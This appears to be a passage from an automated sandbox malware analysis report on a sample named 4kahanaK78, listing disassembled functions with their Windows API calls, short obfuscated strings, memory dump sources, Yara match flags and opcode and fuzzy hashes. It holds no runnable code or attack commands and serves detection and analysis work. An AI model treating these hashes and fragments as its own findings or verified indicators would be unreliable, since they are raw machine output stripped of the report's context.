                                    • API String ID: 1385522511-3597986494
                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction ID: 59acc23c6ae72a031bd4669f738b5fa74ef6f9e6a879dfa4ab37ba94fe350729
                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction Fuzzy Hash: D1014470F003089BCB20FFA9AD40A78B3B5E708314FC082B9D41857250EB3479419BDA
                                    Function 04B47F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B47F95
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 4132704954-3597986494
                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                    • Instruction ID: 6d54276575cec01648bb8cdcd8c95df3e6207059145abe7d593a67d09d2ef70c
                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                    • Instruction Fuzzy Hash: F30126B0B002049BC720EF79BD0099973B4EBC4304F9401B9D12857250DB74B4419BD9
                                    Function 04B47967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B479D5
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: CD^O$_DC[
                                    • API String ID: 4132704954-3597986494
                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction ID: afbe0b1e3a5232ec8fc45a5e0e38780b7958d014a02b47b1471e8b13860023b7
                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                    • Instruction Fuzzy Hash: AA0149B0B00208DBCB20FFB8BD40A5D73B0EB44314F8082EAD11957290DB747441DBC9
                                    Function 00407CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00407D2E
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: CD^O$_DC[
                                    • API String ID: 2296764815-3597986494
                                    • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                    • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                    • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                    • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                    Function 00407700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 0040776E
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: CD^O$_DC[
                                    • API String ID: 2296764815-3597986494
                                    • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                    • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                    • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                    • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                    Function 04CE64B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE6519
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: DCDO$EDO*
                                    • API String ID: 1385522511-3480089779
                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction ID: 9a4274da65ab94f9fbd0f34c1431bece6a73b280ecacf18095417aab1c032893
                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction Fuzzy Hash: 8D01D6B0B023089FD720EFA5E88156CB7B1E704304FD04579CE0597350DB347A818B99
                                    Function 04CE65C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 04CE6629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: DCDO$^]E*
                                    • API String ID: 1385522511-2708296792
                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction ID: 6848e15de3996628be23f43624e09a179a0b14696eba4def435a4b9af94f50d0
                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction Fuzzy Hash: AE01AD70B00208EFD720EF68E94256CBBB1EB04304F84417AC90997394DF357A118B99
                                    Function 04B47427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B47490
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: DCDO$^]E*
                                    • API String ID: 4132704954-2708296792
                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction ID: 6f4b96e39770c75f6dbf9a5ad1d2e765e7569c03ea8a6f485ed5ebe238ee9a96
                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                    • Instruction Fuzzy Hash: 2A01ADB0B00208ABCB20EF68E98256DBBB0EB44314F8401BAC91957390CB35B9109F89
                                    Function 04B47317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                    • __Init_thread_footer.LIBCMT ref: 04B47380
                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                    • String ID: DCDO$EDO*
                                    • API String ID: 4132704954-3480089779
                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction ID: f8e536f69ee61ca72cfba216928ad109341b111eb874ba451fd152c23f1c1cb4
                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                    • Instruction Fuzzy Hash: 0F01D6F0B013089FDB10DF64E98159DB7B0EB85304F9041F9CA15573A0CB347981DB89
                                    Function 004070B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00407119
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: DCDO$EDO*
                                    • API String ID: 2296764815-3480089779
                                    • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                    • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                    • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                    • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                    Function 004071C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00407229
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: DCDO$^]E*
                                    • API String ID: 2296764815-2708296792
                                    • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                    • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                    • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                    • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE